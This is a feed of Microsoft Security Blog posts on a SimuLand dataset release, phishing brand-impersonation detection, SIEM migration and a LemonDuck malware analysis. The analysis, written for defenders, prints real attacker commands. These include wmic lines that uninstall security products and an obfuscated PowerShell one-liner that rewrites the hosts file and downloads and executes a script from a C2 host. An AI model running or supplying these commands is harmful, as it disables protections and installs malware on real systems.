Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft

August 5th, 2021

Last month, we introduced the SimuLand project to help security researchers around the world deploy lab environments to reproduce well-known attack scenarios, actively test detections, and learn more about the underlying behavior and implementation of adversary techniques. Since the release of the project, we have worked on a second phase to improve the current documentation and collect the telemetry generated after running the simulation plans in the lab guides.

Today, we are excited to release a dataset generated from the first simulation scenario to provide security researchers with an option to access data mapped to attack behavior without deploying the full environment.

Sharing SimuLand data to expedite research

In our previous blog post, we showed a basic threat research methodology and where the SimuLand project fits. One of the next steps after a simulation is the collection and analysis of the data generated. We believe we can help expedite the research process by sharing the security events generated during testing.

Figure 1: Map of a threat research methodology emphasizing SimuLand and Security Datasets.

What security events?

The data that you could collect from a SimuLand scenario depends on the adversary tradecraft simulated and the security controls in place. Based on the first simulation scenario, these are some of the security events you can collect and map to adversary behavior:

Figure 2: Adversarial techniques mapped to sources of data.

How are security events collected?

Security events generated during a simulation can be collected using the following APIs:

Where can I download the dataset from?

Rather than creating a new GitHub repository and storing all the security events generated, we are contributing every single dataset to the GitHub repository of the Security Datasets project. This is a community-driven effort developed to share pre-recorded datasets with the Information Security (InfoSec) community to expedite data analysis and threat research. This is another open-source initiative created and maintained by the Open Threat Research community.

You can find our first dataset in the Security Datasets GitHub repository.

What can you do with the dataset?

Besides empowering security researchers to understand the underlying behavior of attack techniques, sharing a dataset also helps to:

  • Expedite the development and validation of detection rules.
  • Identify and validate a chain of events to model adversary behavior.
  • Facilitate labeled and unlabeled data for initial research and feature development.
  • Automate simulation exercises by injecting pre-recorded events into data pipelines.
  • Complement training material and expedite the creation of data analysis use cases.
  • Expedite the creation of internal or community events, such as capture-the-flag or hackathons, where the data is used to create challenges and encourage collaboration.
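As an illustration of the event-injection use case in the list above, the sketch below replays a pre-recorded dataset into a pipeline. The JSON-lines layout, field names, and sample events are hypothetical stand-ins for a Security Datasets export, and the sink is any callable (for example, a function that forwards to a log-ingestion endpoint).

```python
import json

# Hypothetical dataset export: one JSON event per line.
SAMPLE_EXPORT = """\
{"TimeGenerated": "2021-07-01T10:00:00Z", "EventID": 4624, "Hostname": "WORKSTATION5"}
{"TimeGenerated": "2021-07-01T10:00:03Z", "EventID": 4688, "Hostname": "WORKSTATION5"}
"""

def replay_events(raw_export, sink):
    """Parse a JSON-lines dataset and push each event into a pipeline sink.

    Returns the number of events replayed.
    """
    count = 0
    for line in raw_export.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)  # each line is one self-contained event
        sink(event)
        count += 1
    return count

received = []
n = replay_events(SAMPLE_EXPORT, received.append)
print(n, received[0]["EventID"])  # 2 4624
```

Replaying events this way lets detection rules be exercised against realistic attack telemetry without deploying the full lab environment.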

What’s next

With this first dataset, we commit to releasing the security events we generate in our lab environment along with new lab guides. We also hope you can help us identify new sources of data to improve the project and our data collection strategy.

Learn more

To learn more about this open-source initiative, visit the SimuLand GitHub repository.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft appeared first on Microsoft Security Blog.


Spotting brand impersonation with Swin transformers and Siamese neural networks

August 4th, 2021

Every day, Microsoft Defender for Office 365 encounters around one billion brand impersonation emails. Our security solutions use multiple detection and prevention techniques to help users avoid divulging sensitive information to phishers as attackers continue refining their impersonation tricks. In this blog, we discuss our latest innovation toward developing another detection layer focusing on the visual components of brand impersonation attacks. We presented this approach today in our Black Hat briefing, Siamese neural networks for detecting brand impersonation.

Before a brand impersonation detection system can be trained to distinguish between legitimate and malicious email that use the same visual elements, we must first teach it to identify what brand the content is portraying in the first place. Using a combination of machine learning techniques that convert images to real numbers and can perform accurate judgments even with smaller datasets, we have developed a detection system that outperforms all visual fingerprint-based benchmarks on all metrics while maintaining a 90% hit rate. Our system is not simply “memorizing” logos but is making decisions based on other salient aspects such as color schemes or fonts. This, among other state-of-the-art AI that feeds into Microsoft 365 Defender, improves our protection capabilities against the long-standing problem of phishing attacks.

Two-step approach to spot impersonations

In brand impersonation attacks, an email or a website is designed to appear visually identical to a known legitimate brand, like Microsoft 365 or LinkedIn, but the domain—to which user-inputted information, like passwords or credit card details, is sent—is actually controlled by an attacker. An example of a malicious sign-in page impersonating Microsoft is shown in Figure 1.

Figure 1. Example of a Microsoft brand impersonation attempt

Any vision-based system, computer or human, that detects brand impersonation attacks must take a two-step approach upon receiving content:

  1. Determine whether the content looks like content from a known brand, and if so, which brand
  2. Determine if other artifacts associated with the content (such as URLs, domain names, or certificates) match those used by the identified brand

For example, if a brand impersonation detection system sees an image that appears to come from Microsoft but also notices that the URL is indeed from Microsoft and that the certificate matches a known certificate issued to Microsoft, then the content would be classified as legitimate.

However, if the detector encounters content which shares visual characteristics with legitimate Microsoft content like in Figure 1, but then notices that the URL associated with the content is an unknown or unclassified URL with a suspicious certificate, then the content would be flagged as a brand impersonation attack.

Training our system to identify brands

The key to an effective brand impersonation detection system is identifying known brands as reliably as possible. This is true for both a manual system and an automated one. For sighted humans, the process of identifying brands is straightforward. On the other hand, teaching an automated system to identify brands is more challenging. This is especially true because each brand might have several visually distinct sign-in pages.

For example, Figure 2 shows two Microsoft Excel brand impersonation attempts. While both cases share some visual characteristics, the differences in background, color, and text make the creation of rule-based systems to detect brands based on rudimentary similarity metrics (such as robust image hashing) more difficult. Therefore, our goal was to improve brand labeling, which will ultimately improve brand impersonation detection.

Figure 2. More examples of brand impersonation attempts targeting Microsoft Excel

Of course, deep learning is the assumed default tool for image recognition, so it was only natural to perform brand detection by combining labeled brand images with modern deep-learning techniques. To do this, we first sought out, captured, and manually labeled over 50,000 brand impersonation screenshots using our own detonation system.

While our dataset consisted of over 1,300 distinct brands, most brands were not well-represented: 896 brands appeared fewer than five times, and 541 brands appeared in the dataset only once. The lack of significant representation for each brand meant that using standard approaches like a convolutional neural network would not be feasible.

Converting images to real numbers via embeddings

To address the limitations of our data, we adopted a cutting-edge, few-shot learning technique known as Siamese neural networks (sometimes called neural twin networks). However, before explaining what a Siamese neural network is, it is important to understand how embedding-based classifiers work.

Building an embedding-based classifier proceeds in two steps. The first step is to embed the image into a lower dimensional space. All this means is that the classifier transforms the pixels that make up the images into a vector of real numbers. So, for example, the network might take as an input the pixel values in Figure 1 and output the value (1.56, 0.844). Because the network translates the images into two real numbers, we say the network embeds the images into a two-dimensional space.

While in practice we use more than a two-dimensional embedding, Figure 3 shows all our images embedded in two-dimensional space. The red dots represent the embeddings of images all appearing to be from one brand. This effectively translates the visual data into something our neural network can digest.

Figure 3: A two-dimensional representation of embeddings, where the red dots represent one brand

Given the embeddings, the second step of the algorithm is to classify the embedded images. For example, given a set of embedded screenshots and a new screenshot we call X, we can perform brand classification by embedding X and then assigning to X the brand whose image is “closest” to X in the embedded space.
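The nearest-neighbor classification step described above can be sketched as follows. This is a minimal illustration, not the production system: the brand names, toy two-dimensional embeddings (including the (1.56, 0.844) example from the text), and distance threshold are all hypothetical, and the real system works in a higher-dimensional space.

```python
import math

# Toy embeddings: brand -> embedded screenshots as 2-D points.
# Real embeddings are higher-dimensional; these values are illustrative only.
KNOWN = {
    "Microsoft": [(1.56, 0.844), (1.40, 0.90)],
    "LinkedIn":  [(-2.1, 3.0), (-1.9, 3.2)],
}

def classify(x, known=KNOWN, unknown_threshold=1.0):
    """Assign X the brand of its closest embedded screenshot,
    or 'unknown' if nothing is within the (hypothetical) threshold."""
    best_brand, best_dist = None, float("inf")
    for brand, points in known.items():
        for p in points:
            d = math.dist(x, p)
            if d < best_dist:
                best_brand, best_dist = brand, d
    return best_brand if best_dist <= unknown_threshold else "unknown"

print(classify((1.5, 0.9)))    # Microsoft
print(classify((10.0, 10.0)))  # unknown
```

Embedding a new screenshot X and then taking the brand of its nearest neighbor is exactly the "closest in the embedded space" rule the paragraph describes; the threshold is one simple way to surface never-before-seen brands as "unknown".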

Training the system to minimize contrastive loss

In understanding the two-dimensional embeddings above, readers might assume that there was an “embedder” that placed screenshots of the same brand close together, or at least that there was some inherent meaning in the way the images were embedded. Of course, neither was true. Instead, we needed to train our detector to do this.

This is where Siamese neural networks with an associated contrastive loss come into play. A Siamese network takes as an input two raw images and embeds them both. The contrastive loss the network computes is the distance between the images if the images come from the same brand and the negative of the distance between the images if they come from a different brand. This means that when a Siamese network is trained to minimize losses, it embeds screenshots of the same brand close together and screenshots of different brands far apart. An example of how the network minimizes losses is shown in Figure 4.

Figure 4. Successful Siamese network embeddings. The network minimizes loss by embedding screenshots that pertain to Microsoft close together while simultaneously embedding screenshots from Microsoft and LinkedIn far apart. Note that the algorithm is trained on entire screenshots and not just logos. The logos are used here for illustrative purposes only.
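The contrastive loss described above can be sketched in a few lines. Note that the text's description (the negative of the distance for different-brand pairs) is a simplification; a common formulation bounds that term with a margin so the loss cannot be driven arbitrarily low, and that margin-based variant is what is shown here, with an assumed margin value.

```python
import math

def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def contrastive_loss(emb_a, emb_b, same_brand, margin=2.0):
    """Contrastive loss over one pair of embeddings.

    Same-brand pairs are penalized by their distance (pulled together);
    different-brand pairairs are pushed apart, penalized only when they
    fall closer than `margin`. The margin bounds the 'negative distance'
    term described in the text.
    """
    d = euclidean(emb_a, emb_b)
    if same_brand:
        return d ** 2
    return max(0.0, margin - d) ** 2

# Same brand close together -> small loss; different brands far apart -> zero loss.
print(round(contrastive_loss((1.0, 1.0), (1.1, 1.0), same_brand=True), 4))  # 0.01
print(contrastive_loss((1.0, 1.0), (5.0, 5.0), same_brand=False))           # 0.0
```

Minimizing this quantity over many pairs is what drives the embedder to place same-brand screenshots close together and different-brand screenshots far apart, as in Figure 4.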

We also mentioned that the Siamese network can perform any type of classification on the embedded images. Therefore, we used standard feedforward neural networks to train the system to perform the classification. The full architecture is illustrated in Figure 5 below. The images were first embedded into a low dimensional space using Swin transformers, a cutting edge computer-vision architecture. The embeddings were then used to calculate the contrastive loss. Simultaneously, the embeddings were fed into a feedforward neural network which then outputted the predicted class. When training the system, the total loss is the sum of the contrastive loss and a standard log-likelihood loss based on the output of both classification networks.

Figure 5. Siamese neural network architecture

Basing success metrics on costs and benefits of correct labelling

Since this is a multi-class classification system, we needed to be careful about how we defined our metrics for success. Specifically, the notions of a true positive or a false negative are not well-defined in multi-class classification problems. Therefore, we developed metrics based on the associated costs and benefits of real-world outcomes. For example, the cost of mislabeling a known brand as another known brand is not the same as observing a never-before-seen brand but labeling it as a known brand. Furthermore, we separated our metrics for known and unknown brands. As a result, we developed the following five metrics:

  1. Hit rate – the proportion of known brands that are correctly labeled
  2. Known misclassification rate – the proportion of known brands that are incorrectly labeled as another known brand
  3. Incorrect unknown rate – the proportion of known brands that are incorrectly labeled as an unknown brand
  4. Unknown misclassification rate – the proportion of screenshots of unknown brands that are labeled as a known brand
  5. Correct unknown rate – the proportion of screenshots of unknown brands that are correctly labeled as unknown

These metrics are also summarized in Figure 6 below. Since all our images were labeled, we simulated an unknown brand by removing all brands with only one screenshot from the training set and only used them for evaluating our metrics on a held-out test set.

Figure 6. Classification metrics. Metrics with upward-facing triangles indicate that the results are better when they are higher. Metrics with downward-facing triangles are better when they are lower.
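The five metrics above follow mechanically from counting (true, predicted) label pairs. The sketch below shows one way to compute them; the sample pairs and the "unknown" sentinel label are illustrative assumptions, not the actual evaluation data.

```python
from collections import Counter

def brand_metrics(pairs):
    """Compute the five metrics from (true_brand, predicted_brand) pairs.

    'unknown' stands in for brands absent from the training set, matching
    the held-out single-screenshot brands described in the text.
    """
    c = Counter()
    for true, pred in pairs:
        if true != "unknown":
            c["known_total"] += 1
            if pred == true:
                c["hit"] += 1
            elif pred == "unknown":
                c["incorrect_unknown"] += 1
            else:
                c["known_misclassified"] += 1
        else:
            c["unknown_total"] += 1
            if pred == "unknown":
                c["correct_unknown"] += 1
            else:
                c["unknown_misclassified"] += 1
    return {
        "hit_rate": c["hit"] / c["known_total"],
        "known_misclassification_rate": c["known_misclassified"] / c["known_total"],
        "incorrect_unknown_rate": c["incorrect_unknown"] / c["known_total"],
        "unknown_misclassification_rate": c["unknown_misclassified"] / c["unknown_total"],
        "correct_unknown_rate": c["correct_unknown"] / c["unknown_total"],
    }

# Hypothetical evaluation pairs for illustration.
sample = [
    ("Microsoft", "Microsoft"), ("Microsoft", "LinkedIn"),
    ("LinkedIn", "unknown"), ("LinkedIn", "LinkedIn"),
    ("unknown", "unknown"), ("unknown", "Microsoft"),
]
m = brand_metrics(sample)
print(m["hit_rate"], m["correct_unknown_rate"])  # 0.5 0.5
```

Note that the first three rates are normalized by the number of known-brand screenshots and the last two by the number of unknown-brand screenshots, which is why the metrics are reported separately for known and unknown brands.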

Outperforming visual fingerprint-based benchmarks

The main results of our brand impersonation classification system are given in Figure 7 but are straightforward to summarize: Our system outperforms all visual fingerprint-based benchmarks on all metrics while still maintaining a 90% hit rate. The results also show that if minimizing the known misclassification rate were more beneficial than maximizing the hit rate, the known misclassification rate can be kept below 2% while the hit rate remains above 60%, with the Siamese network still beating the visual fingerprint-based approaches on all metrics.

Figure 7. Results of how our system fared against other image recognition systems

We can further examine some examples to show that the network did not simply memorize the screenshots and can correctly label variations on the same brand. Figure 8 shows two different malicious DHL brand impersonation sign-in pages. Despite a different visual layout and color scheme (use of a black bar in the left image, white on the right), the network still correctly classified both. Furthermore, the network was able to correctly classify the image on the left even though it carried several logos of other companies on the bottom bar. This means that the network is doing more than just logo recognition and making decisions based on other features such as color schemes or the dominant font style.

Figure 8. Variations on the DHL sign-in page, both classified correctly by our system as pertaining to DHL

Important applications in detecting phishing campaigns

Phishers have become particularly good at creating phishing websites or crafting emails that closely resemble known legitimate brands visually. This allows them to gain users’ trust and trick them into disclosing sensitive information.

Our work prevents attackers from hijacking legitimate brands by detecting entities that visually look like legitimate brands but do not match other known characteristics or features of that brand. Moreover, this work helps us with threat intelligence generation by clustering known attacks or phishing kits based on the specific brands they target visually and identifying new attack techniques that might impersonate the same brand but employ other attack techniques.

Dedicated research teams in Microsoft stay on top of threats by constantly improving the AI layers that support our threat intelligence which then feeds into our ability to protect against and detect threats. Microsoft Defender for Office 365 protects against email-based threats like phishing and empowers security operations teams to investigate and remediate attacks. Threat data from Defender for Office 365 then increases the quality of signals analyzed by Microsoft 365 Defender, allowing it to provide cross-domain defense against sophisticated attacks.


Justin Grana, Yuchao Dai, Jugal Parikh, and Nitin Kumar Goel

Microsoft 365 Defender Research Team

Congratulations to the MSRC 2021 Most Valuable Security Researchers!

August 4th, 2021

The MSRC Researcher Recognition Program offers public thanks and acknowledgement to the researchers who help protect customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure. Today, we are excited to recognize this year’s Most Valuable Security Researchers (MVRs) based on the impact, accuracy, and volume of their reports. Congratulations to each of our MSRC …

How to manage a side-by-side transition from your traditional SIEM to Azure Sentinel

August 3rd, 2021

With every week bringing new headlines about crippling cyberattacks, and with organizations growing increasingly distributed, security teams are constantly asked to do more with less. Moving to cloud-native security information and event management (SIEM) can help security teams analyze data with the scale of the cloud, and empowers them to focus on protecting the organization, not managing infrastructure. As the industry’s first cloud-native SIEM with built-in security orchestration, automation, and response (SIEM+SOAR), Azure Sentinel provides security analytics across the organization to fight today’s sophisticated cyber threats. It does this by collecting data across the digital estate—including on-premises systems, software as a service (SaaS) applications, and non-Microsoft sources such as Amazon Web Services (AWS) environments, Linux systems, and firewalls—and cross-correlating it using AI and machine learning, enabling security operations (SecOps) teams to stop threats before they do damage.

In part one of this three-part series, we explored the first three steps every SecOps team should take to help ensure a successful migration to Azure Sentinel. For part two, we’ll look at ways to manage the transitional phase of your migration. Specifically, we’ll compare the pros and cons of a short-term versus long-term side-by-side deployment, including an examination of the five types of side-by-side configurations, and which one maximizes value from both Azure Sentinel and your traditional SIEM.

What is the transitional phase in a cloud-native SIEM migration?

For an organization using an on-premises SIEM, migration to the cloud typically requires a three-stage process:

  1. Planning and starting the migration.
  2. Running Azure Sentinel side-by-side with your on-premises SIEM (transitional phase).
  3. Completing the migration (moving completely off the on-premises SIEM).

Step 2, the transitional phase, involves running Azure Sentinel in a side-by-side configuration either as a short-term solution or as a medium-to-long-term operational model. Both approaches culminate in a completely cloud-hosted SIEM architecture; the difference lies in how long it serves your interests to remain tethered to your traditional SIEM.

Transitional side-by-side (recommended)

This approach involves running Azure Sentinel side-by-side with your traditional SIEM just long enough to complete the migration to Azure Sentinel.

Pros: Gives your staff time to adapt to new processes as workloads and analytics migrate. You gain deep correlation across all data sources for hunting scenarios, and you eliminate swivel-chair analytics between SIEMs as well as the need to author forwarding rules and close investigations in two places. This approach also enables your SecOps team to quickly downgrade traditional SIEM solutions, eliminating infrastructure and licensing costs.

Cons: Compresses the learning curve for SecOps staff, who must come up to speed on Azure Sentinel quickly.

Medium-to-long-term side-by-side

This approach involves leveraging both SIEMs side-by-side to analyze different subsets of data. Some organizations choose to run in this model over an extended period of time, or even plan to run side-by-side permanently.

Pros: Leverage Azure Sentinel’s key benefits—including AI, machine learning, and investigation capabilities—without moving completely away from your traditional SIEM. Saves money compared to your traditional SIEM by analyzing your cloud or Microsoft data in Azure Sentinel.

Cons: Separating analytics across two different databases results in greater complexity (for example, split case management and investigations for multi-environment incidents), along with greater staff and infrastructure costs. It requires staff to be knowledgeable in two different SIEM solutions, and it results in a much longer time to full value from Azure Sentinel if the intention is to ultimately migrate to a single SIEM.

What’s the best approach for side-by-side SIEM deployment?

There are five basic deployment models for the side-by-side phase of the migration process. Some of these approaches may seem easier to implement but can introduce unwanted complexity in the long run. Let’s run through the advantages and drawbacks of each:

Approach 1: Moving logs from Azure Sentinel to your traditional SIEM

In this configuration, organizations use Azure Sentinel only as a log relay, forwarding logs to their existing on-premises SIEM. This approach is not recommended, since running Azure Sentinel strictly as a log-relay means you’ll continue to experience the same cost and scale challenges as with your on-premises SIEM. In addition, you’ll be paying for data ingestion in Azure Sentinel along with storage costs in your traditional SIEM. Another drawback: using Azure Sentinel merely as a log relay means you’ll miss out on Azure Sentinel’s full SIEM+SOAR capabilities, including detections, analytics, AI, investigation, and automation tools.

Approach 2: Moving logs from your traditional SIEM to Azure Sentinel

In this approach, your SecOps team forwards logs from your traditional SIEM to Azure Sentinel. For reasons similar to the above, this approach is not recommended. While you’ll be able to benefit from the full functionality of Azure Sentinel without the capacity limitations of an on-premises SIEM, your organization still will be paying for data ingestion to two different vendors. In addition to adding architecture complexity, this model can result in higher costs for your business.

Approach 3: Using Azure Sentinel and your traditional SIEM as separate solutions

In this model, your team uses Azure Sentinel to analyze cloud data while continuing to use your on-premises SIEM to analyze other data sources. This setup allows for clear boundaries regarding when to use which solution, and it avoids the duplication of costs. However, cross-correlation between the two becomes difficult, so this scenario is not recommended. In today’s landscape—where threats often move laterally across the organization—such gaps in visibility pose a significant risk.

Approach 4: Sending alerts and enriched incidents from Azure Sentinel to your traditional SIEM

In this approach, you’ll analyze cloud data in Azure Sentinel, then send the alerts generated to your traditional SIEM. There, you can continue to use your traditional SIEM as your single pane of glass and do any cross-correlation on alerts generated by Azure Sentinel. Though it avoids duplicating costs while giving you the freedom to migrate at your own pace, this configuration is still suboptimal. Simply forwarding enriched incidents to your traditional SIEM limits the value you could be getting from Azure Sentinel’s investigation, hunting, and automation capabilities.

Approach 5: Sending alerts from your traditional SIEM to Azure Sentinel

In this configuration, your SecOps team will ingest and analyze cloud data within Azure Sentinel while using the traditional SIEM to analyze on-premises data—generating alerts back to Azure Sentinel. In this way, your team is free to do cross-correlation and investigation within Azure Sentinel as your single pane of glass, and still access your traditional SIEM for deeper investigation if needed. This is our recommended side-by-side migration method because it allows you to get full value from Azure Sentinel while migrating data at a pace that’s right for your organization.

Coming soon in part 3: Use case migration

In the third and final post in this series, we’ll examine best practices for migrating your data sources and detections, including how to get the most from Azure Sentinel’s powerful automation capabilities. We’ll also offer some tips for finishing the migration and moving completely off your traditional SIEM. For a complete overview of the migration journey, download the white paper: Azure Sentinel Migration Fundamentals.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks

July 29th, 2021

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.]

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in Part 1 of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.

In this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.

Diagram showing the chain of attacks from the LemonDuck and LemonCat infrastructure, detailing attacker behavior common to both and highlighting behavior unique to each infrastructure

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

External or human-initiated behavior

LemonDuck activity initiated from external applications – as opposed to self-spreading methods like malicious phishing mail – is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access maintained through backdoors, and they have a greater impact than standard infections.

In March and April 2021, various vulnerabilities related to the ProxyLogon set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.

In some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.

This self-patching behavior is in keeping with the attackers’ general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.

The LemonDuck operators also make use of many fileless malware techniques, which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.

Beyond these basics, many free or easily available RATs and trojans now routinely use process injection and in-memory execution to circumvent straightforward removal. To counter these behaviors, security teams should review their incident response and malware removal processes to cover all common areas of the operating system where malware may continue to reside after cleanup by an antivirus solution.

General, automatic behavior

If the initial execution begins automatically or from self-spreading methods, it typically originates from a file called Readme.js. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.

In contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from Readme.js. After this, the next few actions that the attackers take, including the scheduled task creation as well as the individual components and scripts, are generally the same.

One of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.

To host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but “blackball”, “blutea”, and “rtsa” have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.

LemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives (specifically the C:\ drive) to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. Tamper protection prevents these actions, but it’s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.

LemonDuck then attempts to automatically remove a series of other security products through CMD.exe, leveraging WMIC.exe. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and Malwarebytes. The attackers also attempt to uninstall any product with “Security” or “AntiVirus” in the name by running the following commands:

cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive

Custom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.

LemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat’s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety of names such as the following:

  • ackng[.]com
  • bb3u9[.]com
  • ttr3p[.]com
  • zz3r0[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • hwqloan[.]com
  • 75[.]ag
  • js88[.]ag
  • qq8[.]ag

In addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:

powershell.EXE -c "$Lemon_Duck='\g0B4wCb';$x='ASTJK'+'';[Net.Dns]::GetHostAddresses('t.tr2'+'')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='http://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
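The pseudorandom hostname written into the hosts file is one hunting opportunity. Below is a hypothetical detection heuristic (an illustrative sketch, not from the original report): it flags hosts-file entries whose leftmost hostname label has unusually high character entropy, as random strings like the ones LemonDuck generates tend to.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def suspicious_hosts_entries(hosts_text: str, threshold: float = 3.0):
    """Return (ip, hostname) pairs whose hostname label looks randomly generated."""
    flagged = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        ip, hostname = parts[0], parts[1]
        label = hostname.split(".", 1)[0]  # leftmost DNS label
        if len(label) >= 5 and shannon_entropy(label) >= threshold:
            flagged.append((ip, hostname))
    return flagged

sample = """\
127.0.0.1 localhost
10.2.3.4  xq9rk2tbv7   # pseudorandom name paired with a C2 IP
"""
print(suspicious_hosts_entries(sample))  # [('10.2.3.4', 'xq9rk2tbv7')]
```

The threshold and minimum label length are tuning assumptions; legitimate entries such as `localhost` fall well below the entropy cutoff, so this is best treated as a triage signal rather than a verdict.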

LemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with .ori file extensions:

  • IF.BIN (used for lateral movement and privilege escalation)
  • KR.BIN (used for competition removal and host patching)
  • M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin (used for mining)

Executables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:

$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"
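The PowerShell above draws 6 to 11 characters from the ASCII ranges for digits, uppercase, and lowercase letters. A Python re-implementation (an illustrative sketch, not the malware's own code) can generate matching fixtures for testing detection rules:

```python
import random
import string

# Same alphabet as the PowerShell char ranges 48..57 + 65..90 + 97..122.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

def random_exe_name(rng: random.Random) -> str:
    length = 6 + rng.randrange(6)  # mirrors 6+(Get-Random)%6, i.e. 6-11 chars
    return "".join(rng.choice(ALPHABET) for _ in range(length)) + ".exe"

name = random_exe_name(random.Random(0))
print(name)  # a 6-11 character alphanumeric name ending in ".exe"
```

Fixtures like these can exercise a pattern such as `^[0-9A-Za-z]{6,11}\.exe$` before deploying it as a custom detection.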

Lateral movement and privilege escalation

IF.Bin, whose name stands for “Infection”, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.

IF.Bin attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren’t already infected. If they aren’t, a copy of Readme.js, as well as subcomponents of IF.Bin, are downloaded into the drive’s home directory as hidden files.

Similarly, IF.Bin attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.

